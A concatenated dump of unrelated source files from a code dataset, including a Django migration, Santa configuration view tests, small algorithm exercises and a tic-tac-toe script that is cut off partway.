tp[\"thresholds\"] += [\n {\n \"op\": \">=\",\n \"value\": metric[\"high_error\"],\n \"clear_op\": \"<\",\n \"clear_value\": metric[\"high_error\"],\n \"alarm_class\": self.get_alarm_class_id(\"NOC | PM | High Error\"),\n }\n ]\n if metric.get(\"low_error\", False):\n tp[\"thresholds\"] += [\n {\n \"op\": \"<=\",\n \"value\": metric[\"low_error\"],\n \"clear_op\": \">\",\n \"clear_value\": metric[\"low_error\"],\n \"alarm_class\": self.get_alarm_class_id(\"NOC | PM | Low Error\"),\n }\n ]\n if metric.get(\"low_warn\", False):\n tp[\"thresholds\"] += [\n {\n \"op\": \"<=\",\n \"value\": metric[\"low_warn\"],\n \"clear_op\": \">\",\n \"clear_value\": metric[\"low_warn\"],\n \"alarm_class\": self.get_alarm_class_id(\"NOC | PM | Low Warning\"),\n }\n ]\n if metric.get(\"high_warn\", False):\n tp[\"thresholds\"] += [\n {\n \"op\": \">=\",\n \"value\": metric[\"high_warn\"],\n \"clear_op\": \"<\",\n \"clear_value\": metric[\"high_warn\"],\n \"alarm_class\": self.get_alarm_class_id(\"NOC | PM | High Warning\"),\n }\n ]\n # Save profile\n tp_coll.insert_one(tp)\n #\n metric[\"threshold_profile\"] = tp_id\n # Store back\n p_coll.update_one({\"_id\": doc.pop(\"_id\")}, {\"$set\": doc})\n\n @staticmethod\n def has_thresholds(metric):\n return (\n metric.get(\"low_error\", False)\n or metric.get(\"low_warn\", False)\n or metric.get(\"high_warn\", False)\n or metric.get(\"high_error\", False)\n or metric.get(\"threshold_profile\")\n )\n\n @classmethod\n @cachetools.cachedmethod(operator.attrgetter(\"_ac_cache\"))\n def get_alarm_class_id(cls, name):\n db = get_db()\n ac_coll = db[\"noc.alarmclasses\"]\n return ac_coll.find_one({\"name\": name}, {\"_id\": 1})[\"_id\"]\n","sub_path":"sla/migrations/0002_thresholdprofiles.py","file_name":"0002_thresholdprofiles.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"174024908","text":"# Imports\n# ==================================================\nfrom sys import exit\n\n\n# Class\n# ==================================================\nclass DefineApplication:\n # PRIVATE\n def __get_user_input( self, message ):\n input_answer = ''\n\n while True:\n try:\n input_answer = str( input( message + \" (t / f): \" ) ).lower()\n print( '--------------------------------------------------\\n' )\n\n if input_answer == 't' or input_answer == 'f':\n break\n\n else:\n print( \"Please answer with t of f\\n\\n\" )\n continue\n\n except:\n print( \"Something went wrong...\" )\n exit()\n\n return input_answer\n\n\n # PUBLIC\n def define_program( self ):\n '''\n Return : list of bool values for steps to take\n --------------------------------------------------\n '''\n program_steps = []\n\n steps = [\n \"Generate barplot of most followed users by target profile's followers?\",\n \"Cluster followers based on who they follow and how they describe themselves?\"\n ]\n\n for step in steps:\n program_steps.append( self.__get_user_input( step ) )\n\n return program_steps","sub_path":"tweepy/explore_twitter_data/DefineApplication.py","file_name":"DefineApplication.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"375109419","text":"from random import randint\r\n\r\nA = [randint(0,10)]\r\nfor i in range(9):\r\n A.append(A[-1] + randint(0,10))\r\nprint(*A)\r\n\r\n\r\nlastEl = 0\r\ncurrLen = 1\r\ncurrDist = 0\r\n\r\ndistLook = {}\r\nfor i, a in enumerate(A):\r\n if i == 0: \r\n lastEl = a\r\n continue\r\n if i == 1: \r\n currLen = 2\r\n currDist = a - lastEl\r\n lastEl = a \r\n continue\r\n if (a - lastEl) != currDist:\r\n distLook.setdefault(currDist, [])\r\n distLook[currDist].append((i - currLen + 1, currLen))\r\n currLen = 2\r\n currDist = a - lastEl\r\n lastEl = a\r\n continue\r\n currLen += 1\r\n lastEl = a\r\n\r\ndistLook.setdefault(currDist, [])\r\ndistLook[currDist].append((i - currLen + 2, currLen))\r\nfor i in range(11):\r\n if i in distLook:\r\n print(i, distLook[i])\r\n\r\n\r\nfor q in range(10000):\r\n L = randint(1, 9)\r\n R = randint(L, 9)\r\n D = randint(0, 10)\r\n\r\n maxLen1 = 1\r\n \r\n # print(1)\r\n # continue\r\n\r\n if D in distLook:\r\n for ele in distLook[D]:\r\n\r\n if ele[0] + ele[1] < L: continue\r\n if ele[0] > R - maxLen1: break\r\n\r\n maxLen1 = max(maxLen1, min(ele[1] - (L - ele[0]), ele[1], R - ele[0] + 1, 1 + (R - L)))\r\n\r\n maxLen2 = 1\r\n curr = 1\r\n \r\n for x1, x2 in zip(A[L - 1:R - 1], A[L:R]):\r\n if x2 - x1 == D:\r\n curr += 1\r\n maxLen2 = max(maxLen2, curr)\r\n else:\r\n curr = 1\r\n if maxLen1 != maxLen2:\r\n print(L, R, D, maxLen1, maxLen2)\r\n\r\n\"\"\"\r\n8 11 21 26 32 42 48 53 55 57\r\n\r\n3 9 2\r\n0 9 2\r\n\r\n\r\n\r\n\r\n\"\"\"","sub_path":"october circuits/arithprogTest.py","file_name":"arithprogTest.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"269942695","text":"import cherrypy\nimport random\nimport time\nimport os\nimport redis\nimport json\nimport uuid\nimport subprocess\n\nredis = redis.Redis()\n\nindex_html = \"\"\"\n\n\n\nMusicazoo WIP\n\n\n\n

    Musicazoo

    \nMusicazoo has been disabled until the end of the party.\n\n\n\"\"\"\n\nclass Musicazoo:\n\t@cherrypy.expose\n\tdef index(self):\n\t\treturn index_html\n\ncherrypy.config.update({'server.socket_port': 8080})\n\ncherrypy.tree.mount(Musicazoo(), os.getenv(\"MZ_LOCATION\") or \"/\")\n\ncherrypy.engine.start()\ncherrypy.engine.block()\n","sub_path":"nopeserver.py","file_name":"nopeserver.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"619382378","text":"import random as rand\nimport gcd\n\n\ndef stress_test(n_input):\n while 1:\n rand.seed(version=2)\n a = rand.randrange(1, n_input)\n b = rand.randrange(1, n_input)\n result1 = gcd.gcd_naive(a, b)\n result2 = gcd.gcd_euclid(a, b)\n if result1 == result2:\n print(\"OK\")\n else:\n print(\"Wrong answer \", result1, result2)\n return\n\n\nif __name__ == \"__main__\":\n N = 50\n print(stress_test(N))\n","sub_path":"Week2/greatest_common_divisor/stress_test_gcd.py","file_name":"stress_test_gcd.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597362684","text":"#\r\n# @lc app=leetcode.cn id=1329 lang=python3\r\n#\r\n# [1329] 将矩阵按对角线排序\r\n#\r\n# https://leetcode-cn.com/problems/sort-the-matrix-diagonally/description/\r\n#\r\n# algorithms\r\n# Medium (63.09%)\r\n# Likes: 0\r\n# Dislikes: 0\r\n# Total Accepted: 348\r\n# Total Submissions: 551\r\n# Testcase Example: '[[3,3,1,1],[2,2,1,2],[1,1,1,2]]'\r\n#\r\n# 给你一个 m * n 的整数矩阵 mat ,请你将同一条对角线上的元素(从左上到右下)按升序排序后,返回排好序的矩阵。\r\n#\r\n#\r\n#\r\n# 示例 1:\r\n#\r\n#\r\n#\r\n# 输入:mat = [[3,3,1,1],[2,2,1,2],[1,1,1,2]]\r\n# 输出:[[1,1,1,1],[1,2,2,2],[1,2,3,3]]\r\n#\r\n#\r\n#\r\n#\r\n# 提示:\r\n#\r\n#\r\n# m == mat.length\r\n# n == mat[i].length\r\n# 1 <= m, n <= 100\r\n# 1 <= mat[i][j] <= 100\r\n#\r\n#\r\n#\r\n\r\n\r\n# @lc code=start\r\nclass Solution:\r\n def diagonalSort(self, mat: List[List[int]]) -> List[List[int]]:\r\n # 遍历开头一行和一列作为start, 排序对应的对角线然后重新填充\r\n rows, cols = len(mat), len(mat[0])\r\n for c in range(cols):\r\n cur = []\r\n for le in range(min(cols - c, rows)):\r\n cur.append(mat[le][c + le])\r\n cur = sorted(cur)\r\n i = 0\r\n for le in range(min(cols - c, rows)):\r\n mat[le][c + le] = cur[i]\r\n i += 1\r\n for r in range(1, rows):\r\n cur = []\r\n for le in range(min(cols, rows - r)):\r\n cur.append(mat[r + le][le])\r\n cur = sorted(cur)\r\n i = 0\r\n for le in range(min(cols, rows - r)):\r\n mat[r + le][le] = cur[i]\r\n i += 1\r\n return mat\r\n\r\n\r\n# @lc code=end\r\n","sub_path":"Medium/1329.将矩阵按对角线排序.py","file_name":"1329.将矩阵按对角线排序.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"334497583","text":"from django.test import TestCase\nfrom mail.models import Mail\nimport unittest\n\n\nclass MailTestCase(unittest.TestCase):\n def setUp(self):\n for _ in range(400):\n Mail.objects.create(name='Test', email='Test@test.com', message_text='This is a test message')\n Mail.objects.create(name='Test.', email='Test@test.ru', message_text='This is a test message...')\n\n def test_email(self):\n email_1 = Mail.objects.get(email='Test@test.ru')\n email_2 = Mail.objects.get(email='Test@test.com')\n self.assertEquals(email_1, 'Test@test.ru')\n self.assertEquals(email_2, 'Test@test.com')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"mail_form/mail_form/mail/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"633889221","text":"import datetime\nfrom functools import reduce\nimport json\nimport operator\nimport plistlib\nfrom django.contrib.auth.models import Group, Permission\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom django.test import TestCase, override_settings\nfrom django.utils.crypto import get_random_string\nfrom zentral.contrib.inventory.models import MetaBusinessUnit, File\nfrom accounts.models import User\nfrom zentral.contrib.santa.models import Bundle, Rule, Target\n\n\ndef get_random_sha256():\n return get_random_string(64, \"abcdef0123456789\")\n\n\n@override_settings(STATICFILES_STORAGE='django.contrib.staticfiles.storage.StaticFilesStorage')\nclass SantaSetupViewsTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n # user\n cls.pwd = \"godzillapwd\"\n cls.user = User.objects.create_user(\"godzilla\", \"godzilla@zentral.io\", cls.pwd)\n cls.group = Group.objects.create(name=get_random_string())\n cls.user.groups.set([cls.group])\n # file tree\n cls.file_sha256 = get_random_sha256()\n cls.file_name = get_random_string()\n cls.file_bundle_name = get_random_string()\n cls.file_cert_sha256 = get_random_sha256()\n cls.file_cert_cn = get_random_string()\n cls.file_cert_ou = get_random_string()\n cls.file, _ = File.objects.commit({\n 'source': {'module': 'zentral.contrib.santa', 'name': 'Santa events'},\n 'bundle': {'bundle_id': 'servicecontroller:com.apple.stomp.transcoderx',\n 'bundle_name': cls.file_bundle_name,\n 'bundle_version': '3.5.3',\n 'bundle_version_str': '3.5.3'},\n 'bundle_path': ('/Library/Frameworks/Compressor.framework/'\n 'Versions/A/Resources/CompressorTranscoderX.bundle'),\n 'name': cls.file_name,\n 'path': ('/Library/Frameworks/Compressor.framework/'\n 'Versions/A/Resources/CompressorTranscoderX.bundle/Contents/MacOS'),\n 'sha_256': cls.file_sha256,\n 'signed_by': {\n 'common_name': cls.file_cert_cn,\n 'organization': 'Apple Inc.',\n 'organizational_unit': cls.file_cert_ou,\n 'sha_256': cls.file_cert_sha256,\n 'valid_from': datetime.datetime(2007, 2, 23, 22, 2, 56),\n 'valid_until': datetime.datetime(2015, 1, 14, 22, 2, 56),\n 'signed_by': {\n 'common_name': 'Apple Code Signing Certification Authority',\n 'organization': 'Apple Inc.',\n 'organizational_unit': 'Apple Certification Authority',\n 'sha_256': '3afa0bf5027fd0532f436b39363a680aefd6baf7bf6a4f97f17be2937b84b150',\n 'valid_from': datetime.datetime(2007, 2, 14, 21, 19, 19),\n 'valid_until': datetime.datetime(2015, 2, 14, 21, 19, 19),\n 'signed_by': {\n 'common_name': 'Apple Root CA',\n 'organization': 'Apple Inc.',\n 'organizational_unit': 'Apple Certification Authority',\n 'sha_256': 'b0b1730ecbc7ff4505142c49f1295e6eda6bcaed7e2c68c5be91b5a11001f024',\n 'valid_from': datetime.datetime(2006, 4, 25, 21, 40, 36),\n 'valid_until': datetime.datetime(2035, 2, 9, 21, 40, 36),\n },\n },\n }\n })\n cls.file_target = Target.objects.create(type=Target.BINARY, sha256=cls.file_sha256)\n\n def login_redirect(self, url):\n response = self.client.get(url)\n self.assertRedirects(response, \"{u}?next={n}\".format(u=reverse(\"login\"), n=url))\n\n def login(self, *permissions):\n if permissions:\n permission_filter = reduce(operator.or_, (\n Q(content_type__app_label=app_label, codename=codename)\n for app_label, codename in (\n permission.split(\".\")\n for permission in permissions\n )\n ))\n self.group.permissions.set(list(Permission.objects.filter(permission_filter)))\n else:\n self.group.permissions.clear()\n self.client.force_login(self.user)\n\n def post_as_json(self, url_name, data):\n return self.client.post(reverse(\"santa:{}\".format(url_name)),\n json.dumps(data),\n content_type=\"application/json\")\n\n def test_configurations_redirect(self):\n self.login_redirect(reverse(\"santa:configuration_list\"))\n self.login_redirect(reverse(\"santa:create_configuration\"))\n\n def test_get_create_configuration_view(self):\n self.login()\n response = self.client.get(reverse(\"santa:create_configuration\"))\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_configuration\")\n response = self.client.get(reverse(\"santa:create_configuration\"))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/configuration_form.html\")\n self.assertContains(response, \"Santa configuration\")\n\n def create_configuration(self):\n response = self.client.post(reverse(\"santa:create_configuration\"),\n {\"name\": get_random_string(64),\n \"batch_size\": 50,\n \"client_mode\": \"1\",\n \"banned_block_message\": \"yo\",\n \"enable_page_zero_protection\": \"on\",\n \"enable_sysx_cache\": \"on\",\n \"mode_notification_lockdown\": \"lockdown\",\n \"mode_notification_monitor\": \"monitor\",\n \"unknown_block_message\": \"block\",\n \"full_sync_interval\": 602,\n }, follow=True)\n configuration = response.context[\"object\"]\n return response, configuration\n\n def test_post_create_configuration_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n response, configuration = self.create_configuration()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(configuration.enable_sysx_cache, True)\n self.assertEqual(configuration.full_sync_interval, 602)\n self.assertTemplateUsed(response, \"santa/configuration_detail.html\")\n self.assertContains(response, configuration.name)\n\n def test_post_update_configuration_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n response = self.client.post(reverse(\"santa:update_configuration\", args=(configuration.pk,)),\n {\"name\": configuration.name,\n \"batch_size\": 50,\n \"client_mode\": \"1\",\n \"banned_block_message\": \"yo\",\n \"enable_page_zero_protection\": \"on\",\n \"mode_notification_lockdown\": \"new lockdown message\",\n \"mode_notification_monitor\": \"monitor\",\n \"unknown_block_message\": \"block\",\n \"full_sync_interval\": 603,\n }, follow=True)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_configuration\", \"santa.change_configuration\", \"santa.view_configuration\")\n response = self.client.post(reverse(\"santa:update_configuration\", args=(configuration.pk,)),\n {\"name\": configuration.name,\n \"batch_size\": 50,\n \"client_mode\": \"1\",\n \"banned_block_message\": \"yo\",\n \"enable_page_zero_protection\": \"on\",\n \"mode_notification_lockdown\": \"new lockdown message\",\n \"mode_notification_monitor\": \"monitor\",\n \"unknown_block_message\": \"block\",\n \"full_sync_interval\": 603,\n }, follow=True)\n configuration = response.context[\"object\"]\n self.assertEqual(configuration.enable_sysx_cache, False)\n self.assertEqual(configuration.full_sync_interval, 603)\n self.assertTemplateUsed(response, \"santa/configuration_detail.html\")\n self.assertContains(response, \"new lockdown message\")\n\n def test_get_create_enrollment_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n response = self.client.get(reverse(\"santa:create_enrollment\", args=(configuration.pk,)))\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_configuration\", \"santa.view_configuration\", \"santa.add_enrollment\")\n response = self.client.get(reverse(\"santa:create_enrollment\", args=(configuration.pk,)))\n self.assertTemplateUsed(response, \"santa/enrollment_form.html\")\n self.assertContains(response, \"Create enrollment\")\n self.assertContains(response, configuration.name)\n\n def create_enrollment(self, configuration, no_assertions=False):\n mbu = MetaBusinessUnit.objects.create(name=\"{} MBU\".format(configuration.name))\n mbu.create_enrollment_business_unit()\n response = self.client.post(reverse(\"santa:create_enrollment\", args=(configuration.pk,)),\n {\"secret-meta_business_unit\": mbu.pk,\n \"configuration\": configuration.pk,\n \"santa_release\": \"\"}, follow=True)\n if no_assertions:\n return response, None\n enrollment = response.context[\"enrollments\"][0]\n self.assertEqual(enrollment.version, 1)\n return response, enrollment\n\n def test_post_create_enrollment_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n response, enrollment = self.create_enrollment(configuration, no_assertions=True)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_configuration\", \"santa.view_configuration\", \"santa.add_enrollment\")\n response, enrollment = self.create_enrollment(configuration)\n self.assertTemplateUsed(response, \"santa/configuration_detail.html\")\n self.assertEqual(response.context[\"object\"], configuration)\n # response does not contain enrollment secret meta business unit name\n self.assertNotContains(response, enrollment.secret.meta_business_unit.name)\n # response does not contain link to download enrollment configuration plist\n self.assertNotContains(response, reverse(\"santa:enrollment_configuration_plist\",\n args=(configuration.pk, enrollment.pk)))\n # response does not contain link to download enrollment configuration profile\n self.assertNotContains(response, reverse(\"santa:enrollment_configuration_profile\",\n args=(configuration.pk, enrollment.pk)))\n self.login(\"santa.view_configuration\", \"santa.view_enrollment\")\n response = self.client.get(configuration.get_absolute_url())\n # response contains enrollment secret meta business unit name\n self.assertContains(response, enrollment.secret.meta_business_unit.name)\n # response contains link to download enrollment configuration plist\n self.assertContains(response, reverse(\"santa:enrollment_configuration_plist\",\n args=(configuration.pk, enrollment.pk)))\n # response contains link to download enrollment configuration profile\n self.assertContains(response, reverse(\"santa:enrollment_configuration_profile\",\n args=(configuration.pk, enrollment.pk)))\n\n def test_enrollment_configuration_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\",\n \"santa.add_enrollment\", \"santa.view_enrollment\")\n _, configuration = self.create_configuration()\n _, enrollment = self.create_enrollment(configuration)\n self.client.logout()\n enrollment_configuration_plist_url = reverse(\n \"santa:enrollment_configuration_plist\", args=(configuration.pk, enrollment.pk)\n )\n self.login_redirect(enrollment_configuration_plist_url)\n enrollment_configuration_profile_url = reverse(\n \"santa:enrollment_configuration_profile\", args=(configuration.pk, enrollment.pk)\n )\n self.login_redirect(enrollment_configuration_profile_url)\n self.login()\n response = self.client.get(enrollment_configuration_plist_url)\n self.assertEqual(response.status_code, 403)\n response = self.client.get(enrollment_configuration_profile_url)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.view_enrollment\")\n response = self.client.get(enrollment_configuration_plist_url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response['Content-Type'], \"application/x-plist\")\n plist_config = plistlib.loads(response.content)\n self.assertTrue(plist_config[\"SyncBaseURL\"].endswith(\n f\"/santa/sync/{enrollment.secret.secret}/\"\n ))\n self.assertEqual(plist_config[\"EnableSysxCache\"], configuration.enable_sysx_cache)\n response = self.client.get(enrollment_configuration_profile_url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response['Content-Type'], \"application/octet-stream\")\n\n def test_configuration_rules_redirects(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n self.client.logout()\n self.login_redirect(reverse(\"santa:configuration_rules\", args=(configuration.pk,)))\n self.login_redirect(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)))\n self.login_redirect(reverse(\"santa:pick_rule_binary\", args=(configuration.pk,)))\n self.login_redirect(reverse(\"santa:pick_rule_bundle\", args=(configuration.pk,)))\n self.login_redirect(reverse(\"santa:pick_rule_certificate\", args=(configuration.pk,)))\n\n def test_configuration_rules_permission_denied(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n for view_name in (\"configuration_rules\", \"create_configuration_rule\",\n \"pick_rule_binary\", \"pick_rule_bundle\", \"pick_rule_certificate\"):\n response = self.client.get(reverse(f\"santa:{view_name}\", args=(configuration.pk,)))\n self.assertEqual(response.status_code, 403)\n\n def test_create_configuration_rule(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n # create\n binary_hash = get_random_sha256()\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_rule\", \"santa.view_rule\")\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/configuration_rules.html\")\n rule = response.context[\"object_list\"][0]\n self.assertEqual(rule.configuration, configuration)\n self.assertEqual(rule.target.sha256, binary_hash)\n self.assertEqual(rule.target.type, Target.BINARY)\n self.assertEqual(rule.policy, Rule.ALLOWLIST)\n self.assertEqual(rule.custom_msg, \"\")\n self.assertEqual(rule.serial_numbers, [])\n self.assertEqual(rule.primary_users, [])\n\n def test_create_conflict_configuration_rule(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\",\n \"santa.add_rule\", \"santa.view_rule\")\n _, configuration = self.create_configuration()\n # create\n binary_hash = get_random_sha256()\n self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n # conflict\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.BLOCKLIST}, follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/rule_form.html\")\n form = response.context[\"form\"]\n self.assertEqual(form.errors, {'__all__': ['A rule for this target already exists']})\n\n def test_update_configuration_rule(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\",\n \"santa.add_rule\", \"santa.view_rule\")\n _, configuration = self.create_configuration()\n # create\n binary_hash = get_random_sha256()\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n rule = response.context[\"object_list\"][0]\n # update\n custom_message = get_random_string()\n serial_numbers = [get_random_string() for i in range(3)]\n primary_users = [get_random_string() for i in range(12)]\n response = self.client.post(reverse(\"santa:update_configuration_rule\", args=(configuration.pk, rule.pk)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.BLOCKLIST,\n \"custom_msg\": custom_message,\n \"serial_numbers\": \", \".join(serial_numbers),\n \"primary_users\": \",\".join(primary_users)}, follow=True)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.change_rule\", \"santa.view_rule\")\n response = self.client.post(reverse(\"santa:update_configuration_rule\", args=(configuration.pk, rule.pk)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.BLOCKLIST,\n \"custom_msg\": custom_message,\n \"serial_numbers\": \", \".join(serial_numbers),\n \"primary_users\": \",\".join(primary_users)}, follow=True)\n self.assertTemplateUsed(response, \"santa/configuration_rules.html\")\n rule = response.context[\"object_list\"][0]\n self.assertEqual(rule.configuration, configuration)\n self.assertEqual(rule.target.sha256, binary_hash)\n self.assertEqual(rule.target.type, Target.BINARY)\n self.assertEqual(rule.policy, Rule.BLOCKLIST)\n self.assertEqual(rule.custom_msg, custom_message)\n self.assertEqual(rule.serial_numbers, serial_numbers)\n self.assertEqual(rule.primary_users, primary_users)\n\n def test_delete_configuration_rule(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\",\n \"santa.add_rule\", \"santa.view_rule\")\n _, configuration = self.create_configuration()\n # create\n binary_hash = get_random_sha256()\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n rule = response.context[\"object_list\"][0]\n # delete GET\n response = self.client.get(reverse(\"santa:delete_configuration_rule\", args=(configuration.pk, rule.pk)))\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.delete_rule\", \"santa.view_rule\")\n response = self.client.get(reverse(\"santa:delete_configuration_rule\", args=(configuration.pk, rule.pk)))\n self.assertTemplateUsed(response, \"santa/rule_confirm_delete.html\")\n self.assertContains(response, binary_hash)\n # delete POST\n response = self.client.post(reverse(\"santa:delete_configuration_rule\", args=(configuration.pk, rule.pk)),\n follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/configuration_rules.html\")\n self.assertFalse(any(rule.target.sha256 == binary_hash for rule in response.context[\"object_list\"]))\n\n def test_pick_rule_binary(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n response = self.client.get(reverse(\"santa:pick_rule_binary\", args=(configuration.pk,)),\n {\"name\": self.file_name})\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_rule\")\n response = self.client.get(reverse(\"santa:pick_rule_binary\", args=(configuration.pk,)),\n {\"name\": self.file_name})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/pick_rule_binary.html\")\n binaries = response.context[\"binaries\"]\n self.assertEqual(binaries, [(self.file, None)])\n self.assertContains(response, self.file.sha_256)\n\n def test_pick_rule_bundle(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n bundle_target = Target.objects.create(type=Target.BUNDLE, sha256=get_random_sha256())\n bundle = Bundle.objects.create(\n target=bundle_target,\n path=get_random_string(),\n executable_rel_path=get_random_string(),\n bundle_id=self.file.bundle.bundle_id,\n name=self.file_bundle_name,\n version=self.file.bundle.bundle_version,\n version_str=self.file.bundle.bundle_version_str,\n binary_count=1\n )\n # 403\n response = self.client.get(reverse(\"santa:pick_rule_bundle\", args=(configuration.pk,)),\n {\"name\": self.file_bundle_name})\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_rule\")\n # bundle not ready, no go\n response = self.client.get(reverse(\"santa:pick_rule_bundle\", args=(configuration.pk,)),\n {\"name\": self.file_bundle_name})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/pick_rule_bundle.html\")\n self.assertEqual(response.context[\"bundles\"], [(bundle, None)])\n self.assertContains(response, \"Bundle not uploaded yet\")\n self.assertNotContains(response, \"Create rule\")\n # bundle read, OK\n bundle.binary_targets.add(self.file_target)\n bundle.uploaded_at = datetime.datetime.now()\n bundle.save()\n response = self.client.get(reverse(\"santa:pick_rule_bundle\", args=(configuration.pk,)),\n {\"name\": self.file_bundle_name})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/pick_rule_bundle.html\")\n self.assertEqual(response.context[\"bundles\"], [(bundle, None)])\n self.assertNotContains(response, \"Bundle not uploaded yet\")\n self.assertContains(response, \"Create rule\")\n\n def test_pick_rule_certificate(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n response = self.client.get(reverse(\"santa:pick_rule_certificate\", args=(configuration.pk,)),\n {\"query\": self.file_cert_ou})\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_rule\")\n response = self.client.get(reverse(\"santa:pick_rule_certificate\", args=(configuration.pk,)),\n {\"query\": self.file_cert_ou})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/pick_rule_certificate.html\")\n certificates = response.context[\"certificates\"]\n self.assertEqual(certificates, [(self.file.signed_by, None)])\n","sub_path":"tests/santa/test_setup_views.py","file_name":"test_setup_views.py","file_ext":"py","file_size_in_byte":25984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"417087172","text":"board=[\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\"]\r\n\r\ngame_active = True\r\nwinner = None\r\ncurrent = \"X\"\r\nplayer1=\"\"\r\nplayer2=\"\"\r\n\r\n\r\ndef display_board():\r\n print(\" | \", board[0], \" | \", board[1], \" | \", board[2], \" | \")\r\n print(\" | \", board[3], \" | \", board[4], \" | \", board[5], \" | \")\r\n print(\" | \", board[6], \" | \", board[7], \" | \", board[8], \" | \")\r\n\r\ndef play_game():\r\n\r\n print(\"Welcome to Tic Tac Toe...\")\r\n print(\"Please enter your names : \")\r\n get_players()\r\n\r\n display_board()\r\n\r\n while game_active:\r\n\r\n handle_turn(current)\r\n\r\n check_game_over()\r\n\r\n change_player()\r\n\r\n\r\n if (winner==\"X\"):\r\n print(\"Winner : \", player1)\r\n elif(winner==\"O\"):\r\n print(\"Winner : \", player2)\r\n elif winner==None:\r\n print(\"Tie\")\r\n\r\n\r\n\r\ndef handle_turn(current):\r\n valid=False\r\n\r\n position = input(\"Enter position from 1-9 : \")\r\n\r\n while not valid:\r\n while position not in [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",]:\r\n position = input(\"Invalid inuput. Enter valid position from 1-9 : \")\r\n\r\n position = 